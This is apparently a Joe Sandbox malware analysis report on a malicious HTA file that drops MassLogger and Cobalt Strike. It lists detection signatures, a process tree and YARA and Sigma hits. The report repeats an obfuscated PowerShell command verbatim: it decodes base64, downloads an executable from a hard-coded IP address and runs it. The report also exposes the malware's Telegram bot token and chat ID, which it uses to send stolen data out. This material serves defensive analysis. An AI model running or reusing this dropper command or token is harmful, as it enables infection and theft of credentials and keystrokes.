Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
kissingwithbestexperiencedgirlfriendonhereformenice.hta

Overview

General Information

Sample name:kissingwithbestexperiencedgirlfriendonhereformenice.hta
Analysis ID:1635005
MD5:44c14076ca1d30867c0d128f9f553092
SHA1:0457005f50f88b70ec784c181f5723751323264e
SHA256:7c8d4575e210ab0de64be7c64a2bcf3d559d3986746f151485576a608ca8cf7d
Tags:htauser-abuse_ch
Infos:

Detection

Cobalt Strike, MSIL Logger, MassLogger RAT
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected Cobalt Strike Beacon
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Powershell decode and execute
Yara detected Telegram RAT
.NET source code references suspicious native API functions
Binary is likely a compiled AutoIt script file
Contains functionality to log keystrokes (.Net Source)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious MSHTA Child Process
Suspicious command line found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 6492 cmdline: mshta.exe "C:\Users\user\Desktop\kissingwithbestexperiencedgirlfriendonhereformenice.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 2700 cmdline: "C:\Windows\system32\cmd.exe" "/C poWERsHElL.eXe -ex BypasS -Nop -w 1 -c DevIcecredEntIalDEPLOYmENT.eXE ; Iex($(iEx('[sYsTeM.texT.enCodING]'+[chAR]58+[Char]0x3A+'Utf8.gEtstriNG([sYStEm.cOnveRt]'+[CHaR]0X3A+[cHaR]0x3A+'fRombase64strIng('+[chaR]0x22+'JFhUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlUkRFZkluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEp6ZkhCcFVUcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaTXBrLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpVmFWY0lOWG8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVZuYW9lKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQmlzVkFURm9zIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTd0N6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC81NjAvdmNjLmV4ZSIsIiRlTnY6QVBQREFUQVx2Y2MuZXhlIiwwLDApO1NUQXJ0LXNMZWVQKDMpO0lOVm9LZS1JVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx2Y2MuZXhlIg=='+[chAr]0x22+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5224 cmdline: poWERsHElL.eXe -ex BypasS -Nop -w 1 -c DevIcecredEntIalDEPLOYmENT.eXE ; Iex($(iEx('[sYsTeM.texT.enCodING]'+[chAR]58+[Char]0x3A+'Utf8.gEtstriNG([sYStEm.cOnveRt]'+[CHaR]0X3A+[cHaR]0x3A+'fRombase64strIng('+[chaR]0x22+'JFhUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlUkRFZkluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEp6ZkhCcFVUcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaTXBrLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpVmFWY0lOWG8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVZuYW9lKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQmlzVkFURm9zIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTd0N6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC81NjAvdmNjLmV4ZSIsIiRlTnY6QVBQREFUQVx2Y2MuZXhlIiwwLDApO1NUQXJ0LXNMZWVQKDMpO0lOVm9LZS1JVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx2Y2MuZXhlIg=='+[chAr]0x22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 7200 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfzuxwqd\qfzuxwqd.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 7232 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES94CA.tmp" "c:\Users\user\AppData\Local\Temp\qfzuxwqd\CSCADD237997B8E4BD496D9E414C49E4A6C.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • vcc.exe (PID: 7540 cmdline: "C:\Users\user\AppData\Roaming\vcc.exe" MD5: 0FD138D0A654100FD6E3CCDEBCE396A3)
          • RegSvcs.exe (PID: 7568 cmdline: "C:\Users\user\AppData\Roaming\vcc.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Configuration

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7598843355:AAHehybWWiULdkPS1RLFstdr4_yw-SdkoII", "Telegram Chatid": "7668947425"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.2495361792.00000000003D2000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    0000000C.00000002.2495361792.00000000003D2000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000C.00000002.2495361792.00000000003D2000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
        0000000C.00000002.2495361792.00000000003D2000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          0000000C.00000002.2495361792.00000000003D2000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0xefdf:$a1: get_encryptedPassword
          • 0xf307:$a2: get_encryptedUsername
          • 0xed7a:$a3: get_timePasswordChanged
          • 0xee9b:$a4: get_passwordField
          • 0xeff5:$a5: set_encryptedPassword
          • 0x10951:$a7: get_logins
          • 0x10602:$a8: GetOutlookPasswords
          • 0x103f4:$a9: StartKeylogger
          • 0x108a1:$a10: KeyLoggerEventArgs
          • 0x10451:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 17 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          11.2.vcc.exe.3290000.1.raw.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            11.2.vcc.exe.3290000.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              11.2.vcc.exe.3290000.1.raw.unpackJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
                11.2.vcc.exe.3290000.1.raw.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  11.2.vcc.exe.3290000.1.raw.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0xf1df:$a1: get_encryptedPassword
                  • 0xf507:$a2: get_encryptedUsername
                  • 0xef7a:$a3: get_timePasswordChanged
                  • 0xf09b:$a4: get_passwordField
                  • 0xf1f5:$a5: set_encryptedPassword
                  • 0x10b51:$a7: get_logins
                  • 0x10802:$a8: GetOutlookPasswords
                  • 0x105f4:$a9: StartKeylogger
                  • 0x10aa1:$a10: KeyLoggerEventArgs
                  • 0x10651:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 13 entries

                  Other

                  SourceRuleDescriptionAuthorStrings
                  amsi32_5224.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Suspicious MSHTA Child Process
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C poWERsHElL.eXe -ex BypasS -Nop -w 1 -c DevIcecredEntIalDEPLOYmENT.eXE ; Iex($(iEx('[sYsTeM.texT.enCodING]'+[chAR]58+[Char]0x3A+'Utf8.gEtstriNG([sYStEm.cOnveRt]'+[CHaR]0X3A+[cHaR]0x3A+'fRombase64strIng('+[chaR]0x22+'JFhUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlUkRFZkluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEp6ZkhCcFVUcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaTXBrLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpVmFWY0lOWG8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVZuYW9lKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQmlzVkFURm9zIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTd0N6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC81NjAvdmNjLmV4ZSIsIiRlTnY6QVBQREFUQVx2Y2MuZXhlIiwwLDApO1NUQXJ0LXNMZWVQKDMpO0lOVm9LZS1JVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx2Y2MuZXhlIg=='+[chAr]0x22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C poWERsHElL.eXe -ex BypasS -Nop -w 1 -c DevIcecredEntIalDEPLOYmENT.eXE ; Iex($(iEx('[sYsTeM.texT.enCodING]'+[chAR]58+[Char]0x3A+'Utf8.gEtstriNG([sYStEm.cOnveRt]'+[CHaR]0X3A+[cHaR]0x3A+'fRombase64strIng('+[chaR]0x22+'JFhUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlUkRFZkluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEp6ZkhCcFVUcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaTXBrLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpVmFWY0lOWG8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVZuYW9lKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQmlzVkFURm9zIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTd0N6ICAgICAgICA
                    Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfzuxwqd\qfzuxwqd.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfzuxwqd\qfzuxwqd.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: poWERsHElL.eXe -ex BypasS -Nop -w 1 -c DevIcecredEntIalDEPLOYmENT.eXE ; Iex($(iEx('[sYsTeM.texT.enCodING]'+[chAR]58+[Char]0x3A+'Utf8.gEtstriNG([sYStEm.cOnveRt]'+[CHaR]0X3A+[cHaR]0x3A+'fRombase64strIng('+[chaR]0x22+'JFhUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlUkRFZkluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEp6ZkhCcFVUcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaTXBrLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpVmFWY0lOWG8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVZuYW9lKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQmlzVkFURm9zIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTd0N6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC81NjAvdmNjLmV4ZSIsIiRlTnY6QVBQREFUQVx2Y2MuZXhlIiwwLDApO1NUQXJ0LXNMZWVQKDMpO0lOVm9LZS1JVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx2Y2MuZXhlIg=='+[chAr]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5224, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfzuxwqd\qfzuxwqd.cmdline", ProcessId: 7200, ProcessName: csc.exe
                    Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5224, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcc[1].exe
                    Sigma detected: Dynamic CSharp Compile Artefact
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5224, TargetFilename: C:\Users\user\AppData\Local\Temp\qfzuxwqd\qfzuxwqd.cmdline
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: poWERsHElL.eXe -ex BypasS -Nop -w 1 -c DevIcecredEntIalDEPLOYmENT.eXE ; Iex($(iEx('[sYsTeM.texT.enCodING]'+[chAR]58+[Char]0x3A+'Utf8.gEtstriNG([sYStEm.cOnveRt]'+[CHaR]0X3A+[cHaR]0x3A+'fRombase64strIng('+[chaR]0x22+'JFhUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlUkRFZkluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEp6ZkhCcFVUcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaTXBrLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpVmFWY0lOWG8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVZuYW9lKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQmlzVkFURm9zIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTd0N6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC81NjAvdmNjLmV4ZSIsIiRlTnY6QVBQREFUQVx2Y2MuZXhlIiwwLDApO1NUQXJ0LXNMZWVQKDMpO0lOVm9LZS1JVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx2Y2MuZXhlIg=='+[chAr]0x22+'))')))", CommandLine: poWERsHElL.eXe -ex BypasS -Nop -w 1 -c DevIcecredEntIalDEPLOYmENT.eXE ; Iex($(iEx('[sYsTeM.texT.enCodING]'+[chAR]58+[Char]0x3A+'Utf8.gEtstriNG([sYStEm.cOnveRt]'+[CHaR]0X3A+[cHaR]0x3A+'fRombase64strIng('+[chaR]0x22+'JFhUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlUkRFZkluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEp6ZkhCcFVUcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaTXBrLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpVmFWY0lOWG8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVZuYW9lKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQmlzVkFURm9zIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTd0N6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICA

                    Data Obfuscation

                    barindex
                    Sigma detected: Dot net compiler compiles file from suspicious location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfzuxwqd\qfzuxwqd.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfzuxwqd\qfzuxwqd.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: poWERsHElL.eXe -ex BypasS -Nop -w 1 -c DevIcecredEntIalDEPLOYmENT.eXE ; Iex($(iEx('[sYsTeM.texT.enCodING]'+[chAR]58+[Char]0x3A+'Utf8.gEtstriNG([sYStEm.cOnveRt]'+[CHaR]0X3A+[cHaR]0x3A+'fRombase64strIng('+[chaR]0x22+'JFhUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlUkRFZkluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEp6ZkhCcFVUcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaTXBrLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpVmFWY0lOWG8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVZuYW9lKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQmlzVkFURm9zIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTd0N6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC81NjAvdmNjLmV4ZSIsIiRlTnY6QVBQREFUQVx2Y2MuZXhlIiwwLDApO1NUQXJ0LXNMZWVQKDMpO0lOVm9LZS1JVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx2Y2MuZXhlIg=='+[chAr]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5224, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths 